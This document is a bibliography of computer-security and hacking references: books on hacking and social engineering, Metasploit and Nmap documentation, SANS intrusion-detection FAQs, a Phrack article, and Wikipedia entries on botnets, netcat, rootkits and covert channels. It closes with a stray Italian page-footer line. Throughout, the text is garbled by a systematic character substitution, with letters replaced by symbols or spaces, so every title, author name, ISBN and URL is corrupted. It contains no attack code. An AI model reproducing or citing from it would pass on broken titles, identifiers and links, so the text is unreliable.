$tt"s%&&III2.sans.org&readingUroo &I$ite"a"ers&$ac6ers&055."$" =ACRUBE4%=ac6ers BeIare. Eric Cole# 2..*# 7,B@%.(+-5+(*..0(.# $tt"%&&boo6s.google.co .ar&boo6sYida/@<u2r$'d1VC =ACRUEF=7C%F$e =ac6er Et$ic and t$e ,"irit o/ t$e 7n/or ation Age. =i anen# !e66aH Forvalds# :inusH Castells# Manuel# 2..*# 7,B@%7,B@ .(-+5(5.5JJ(.# $tt"%&&III.a azon.co &=ac6er(Et$ic(!e66a(=i anen&d"&.-+55.5JJ. =ACRUEA!%=ac6ing E9"osed. ,tuart McClure# Joel ,ca bra'# Peorge Rutz# 2..5# 7,B@%0+O..+22J.O*J# $tt"%&&III.a azon.co &=ac6ing(E9"osed(5t$&d"&..+22J.O*5 =ACRU,FACR%=ac6 t$e ,tac6. Mic$ael Pregg# ,te"$en 4at6ins# Peorge Ma's# C$ris <ies# <on Bandes# Brandon Fran6lin# 2..J# 7,B@%*(50+10(*.0(O# $tt"%&&boo6s.google.co .ar&boo6sY idatU.=Kn4Cd2oC

=5U@MA!%=ost 5iscover' Iit$ n a". Autor% Mar6 4ol/gang# $tt"%&&n a".org&docs&discover'."d/ 7!U,!??F% 7! ,"oo/ing% An 7ntroduction# $tt"%&&aandrtec$.org&Fec$&@etIor6ing&@etIor6s ]2.*]2.(]2.!rog(1*2&=andouts&7!]2.,"oo/ing."d/ 7,?CU,FAF% ?//ice Ior6ers give aIa' "assIords /or a c$ea" "en# $tt"%&&III.t$eregister.co.u6&2..-&.1&*O&o//iceUIor6ersUgiveUaIa'U"assIords& 7F,UM7F%7F, ,tatus <e"ort. Autor% 5onald E. Eastla6e# /t"%&&"ublications.ai. it.edu&ai( "ublications&"d/&A7M(2-O."d/ Rern% F$e :inu9 Rernel# $tt"%&&III.6ernel.org& RMUA?5%F$e Art o/ 5ece"tion% Controlling t$e =u an Ele ent o/ ,ecurit'. Revin Mitnic6# 4illia :. ,i on# ,teve 4oznia6# 2..2# 7,B@%.(1+*(2-+*2(1# $tt"%&&boo6s.google.co .ar&boo6sYidaJ2FQMvQcVg2C :ELKU=ACR%=ac6ers% =eroes o/ t$e Co "uter <evolution.. ,teven :ev'# *0O1# 7,B@%.-O5-*2*.5# $tt"%&&III.gutenberg.org&ete9t&+20 :?PUMAPUA!!F7@P%7denti/iable Finger"rints in @etIor6 A""lications. Autor% Jason 5a ron# $tt"%&&III.useni9.org&"ublications&login&2..-(*2&"d/s&da ron."d/ MEFAU5ELP%Metas"loit -.. 5evelo"eris Puide. Autor% F$e Metas"loit ,ta//# $tt"%&&III. etas"loit.org&docu ents&develo"ersUguide."d/ MEFAUF??:%Metas"loit Fool6it. 5avid Ma'nor# R.R. Moo6$e'# Jaco"o Cervini# Fairuzan <oslan# Revin Beaver# 2..+# 7,B@%0+O(*(50+10(.+1(.# $tt"%&&III.a azon.co &Metas"loit( !enetration(5evelo" ent(Lulnerabilit'(<esearc$&d"&*50+10.+1* M2:U=7,% Multics =istor'# $tt"%&&III. ulticians.org&$istor'.$t l M2:U7@F<?% 7ntroduction and ?vervieI o/ t$e Multics ,'ste # $tt"%&&III. ulticians.org&/jcc*.$t l M2:UF7ME% Multics C$ronolog'# $tt"%&&III. ulticians.org&c$rono.$t l @MA!UF4EL%@ a" ( FireIall&75, Evasion and ,"oo/ing. Autor% n a".org# $tt"%&&n a".org& an& an(b'"ass(/ireIalls(ids.$t l @MA!U75:E% 7dle ,canning and <elated 7!75 Pa es# $tt"%&&n a".org&idlescan.$t l @MA!U@,E%@ a" ,cri"ting Engine. Autor% @ a".org# $tt"%&&n a".org&nse& @MA!U?,*%<e ote ?, detection via FC!&7! ,tac6 Finger!rinting ( First Peneration. Autor% F'odor# $tt"%&&n a".org&n a"(/inger"rinting(old.$t l @MA!U?,2%<e ote ?, 5etection using FC!&7! Finger"rinting ;2nd Peneration>. Autor% F'odor# $tt"%&&n a".org&osdetect&inde9.$t l @MA!UL,CA@%@ a" ( ,ervice and A""lication Lersion 5etection. Autor% @ a".org# $tt"%&&n a".org&vscan&inde9.$t l ?BUC<AK%?bituar' ( ,e' our Cra'# Fat$er o/ su"erco "uting. Autor% C$ris :azou# $tt"%&&III.$oise.co &"ri eur&0J&"r(0J(oct&C:(!<(*.(0J(-.$t l !5!U!:A% !5! !lanet# $tt"%&&III."d""lanet.org& !5!*.(!<M%5ECs'ste (*.# 5EC,K,FEM(2. !rocessor <e/erence Manual. 5igital Equi" ent Cor"oration# *0JO# *0+*# *0+1# *0+O# *0O2# 7,B@%# $tt"%&&"d"*..nocreI.org&docs&ad($-0*a(t*."d/ !5!*.(4eb% F$e 5EC !5!(*. E ulation 4eb"age# $tt"%&&III.aracnet.co &`$eal'z$&"d"*.e u.$t l !5!**(=BR%5igital Equi" ent Cor"oration !5!(** Manual. Autor% 5igital Equi" ent Cor"oration# $tt"%&&researc$. icroso/t.co &users&PBell&5igital&5ECMuseu .$t

!<RU10%!ort ,canning Iit$out t$e ,K@ /lag. Autor% 2riel Mai on# $tt"%&&III."$rac6.org&issues.$t lYissuea10Wida*5carticle <FCU+0-% Frans ission Control !rotocol% Functional ,"eci/ication# $tt"%&&tools.iet/.org&$t l&r/c+0-c"age(J5 <7@PU?,% <ing out t$e old# <7@P in t$e @eI% ?, Finger"rinting t$roug$ <F?s# $tt"%&&III."lanb(securit'.net&I"&ring.$t l <7@PU?,F@P%@eI Fool And Fec$nique For <e ote ?"erating ,'ste Franc6 Le'sset# ?livier Courta'# ?livier =een# $tt"%&&III.l.t-6.org&biblio&/inger"rinting&englis$&ring(/ull("a"er."d/ <?4UC?LC=%Covert C$annels in t$e FC!&7! !rotocol ,uite. Autor% Craig =. <oIland# $tt"%&&III./irst onda'.org&issues&issue2U5&roIland& ,A7:UM2,% ,A7: Co "uter =istor' E9$ibits# $tt"%&&in/olab.stan/ord.edu&"ub&vo'& useu .$t l ,A@,UAMA!%7ntrusion 5etection FAV% 4$at is AMa" and $oI does it /inger"rint a""licationsY. Autor% Antonia <ana# $tt"%&&III.sans.org&resources&id/aq&a a"."$" ,A@,UC?LC=%7ntrusion 5etection FAV% 4$at is covert c$annel and I$at are so e e9a "lesY. Autor% A an Abdulla# $tt"%&&III.sans.org&resources&id/aq&covertUc$an."$" ,A@,U,CA@<A@5%7ntrusion 5etection FAV% 4$at is ,canrandY. Autor% Mic$ael 4isener# $tt"%&&III.sans.org&resources&id/aq&scanrand."$" ,A@,UF?!*.%F$e Fen Most 7 "ortant ,ecurit' Frends o/ t$e Co ing Kear. Autor% ,A@, 7nstitute 2..J# $tt"%&&III.sans.org&resources&*.Usecurit'Utrends."d/ ,ECU!F%,ecurit' !oIer Fools. Br'an Burns# Jenni/er ,tisa Pranic6# ,teve Manzui6# !aul Puersc$# 5ave Rillion# @icolas Beauc$esne# Eric Moret# Julien ,obrier# Mic$ael :'nn# Eric Mar6$a # C$ris 7ezzoni# and !$ili""e Biondi# 2..+# 7,B@%.(50J(..0J-(*# $tt"%&&III.oreill'.co &catalog&0+O.50J..0J-2& ,ECU4A<%,ecurit' 4arrior. C'rus !ei6ari# Anton C$uva6in# 2..1# 7,B@%.(50J(..515(O# $tt"%&&III.oreill'.co &catalog&sIarrior&inde9.$t l ,@CU75:E%,ecrets o/ @etIor6 Cartogra"$'% A Co "re$ensive Puide to @ a". Ja es Messer# 2..+# 7,B@%# $tt"%&&III.netIor6u"ti e.co &n a"&inde9.s$t l ,2@U:7@R% 4$ic$ is better# static or d'na ic lin6ingY# $tt"%&&sunsite.ua6o .s6&sunIorldonline&sIol(.2(*00J&sIol(.2("er/.$t l FC!&7!U7ll%FC!&7! 7llustrated# Lol. *% F$e !rotocols. 4.<ic$ard ,tevens# *001# 7,B@%.2.*J--1J0# $tt"%&&III.6o$ala.co &start&tc"i"iv*.$t l 2@7C?<@U5EFC?@% 7ntroducing 2nicornscan# $tt"s%&&III.de/con.org&i ages&de/con(*-&dc*-( "resentations&5CU*-(:ee."d/ 2ni9-2v%A 2@7Aj ?"erating ,'ste /or t$e 5EC LAA(**&+O. Co "uter. Autor% F$o as B. :ondon# Jo$n F. <eiser# $tt"%&&III.cs.bell(labs.co &I$o&d r&ot$er"orts&-2v.$t l 47R7UB@EF% Botnet# $tt"%&&en.Ii6i"edia.org&Ii6i&Botnet 47R7UC?LC=% Covert C$annel# $tt"%&&en.Ii6i"edia.org&Ii6i&CovertUc$annel 47R7U52M!% 7n/or ation 5iving# $tt"%&&en.Ii6i"edia.org&Ii6i&7n/or ationUdiving 47R7UE@% E@7AC# $tt"%&&en.Ii6i"edia.org&Ii6i&Eniac 47R7UEA!:%E9"loit ;Co "uter ,cience>. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&E9"loitU;co "uterUscience> 47R7UFF!C% :ist o/ FF! server return codes# $tt"%&&en.Ii6i"edia.org&Ii6i&:istUo/UFF!UserverUreturnUcodes Finger"rinting. Autor%

47R7U=CC% =o ebreI Co "uter Club# $tt"%&&en.Ii6i"edia.org&Ii6i&=o ebreIUCo "uterUClub 47R7U7CM!%7nternet Control Message !rotocol ( 7CM!. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&7nternetUControlUMessageU!rotocol 47R7U7!v1%7!v1 !rotocol. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&7!v1 47R7U7F,%7nco "atible Fi es$aring ,'ste . Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&7nco "atibleUFi es$aringU,'ste 47R7UR:?P% =ardIare 6e'logger# $tt"%&&en.Ii6i"edia.org&Ii6i&=ardIareU6e'logger 47R7U:7@% 4i6i"edia% :inu9# $tt"%&&es.Ii6i"edia.org&Ii6i&:inu9 47R7U:?CR% :oc6 !ic6ing# $tt"%&&en.Ii6i"edia.org&Ii6i&:oc6U"ic6ing 47R7U:F% :inus Forvalds# $tt"%&&en.Ii6i"edia.org&Ii6i&:inusUForvalds 47R7UM!=K% Mur"$'Ms :aIs# $tt"%&&en.Ii6i"edia.org&Ii6i&Mur"$'MsUlaI 47R7UM2:%Multics. Autor% # $tt"%&&en.Ii6i"edia.org&Ii6i&Multics 47R7U@C% netcat# $tt"%&&en.Ii6i"edia.org&Ii6i&@etcat 47R7U!5!% ,erie !5!# $tt"%&&en.Ii6i"edia.org&Ii6i&!rogra 47R7U<R7F% <oot6it# $tt"%&&en.Ii6i"edia.org&Ii6i&<oot6it 47R7U,,F% ,$oulder sur/ing# $tt"%&&en.Ii6i"edia.org&Ii6i&,$oulderUsur/ingU ]2Oco "uterUsecurit']20 47R7UFC!%FC! ( Frans ission Control !rotocol. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&Frans issionUControlU!rotocol 47R7UFE:@EF% Felnet# $tt"%&&es.Ii6i"edia.org&Ii6i&Felnet 47R7UF?!,*.% # $tt"%&&en.Ii6i"edia.org&Ii6i&F?!,(*. 47R7UF<?K% Frojan $orse ;co "uting># $tt"%&&en.Ii6i"edia.org&Ii6i&FrojanU$orseU ]2Oco "uting]20 47R7UFA.%FA(.. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&FA(. 47R7U25!%25! !rotocol. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&2serU5atagra U!rotocol 47R7U24% 2ni9 4ars# $tt"%&&en.Ii6i"edia.org&Ii6i&2ni9UIars 47R7U2A% 4i6i"edia% 2ni9# $tt"%&&en.Ii6i"edia.org&Ii6i&2ni9 47R7UL7<2,% Co "uter Lirus# $tt"%&&en.Ii6i"edia.org&Ii6i&Co "uterUvirus 47R7UL2:@%Lulnerabilit' ;Co "uting>. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&Lulnerabilit'U;co "uting> 47R7U4?<M% Co "uter 4or # $tt"%&&en.Ii6i"edia.org&Ii6i&Co "uterUIor 47R7UQ?MB7E% Qo bie Co "uter# $tt"%&&en.Ii6i"edia.org&Ii6i&Qo bieUco "uters A!A<C4EB% Aero9 !alo Alto <esearc$ Center# $tt"%&&III."arc.co &about&$istor'& edU5ataU!rocessor 47R7U!7P% !igg'bac6ing ;securit'># $tt"%&&en.Ii6i"edia.org&Ii6i&!igg'bac6ingU]2Osecurit']20

Potrebbero piacerti anche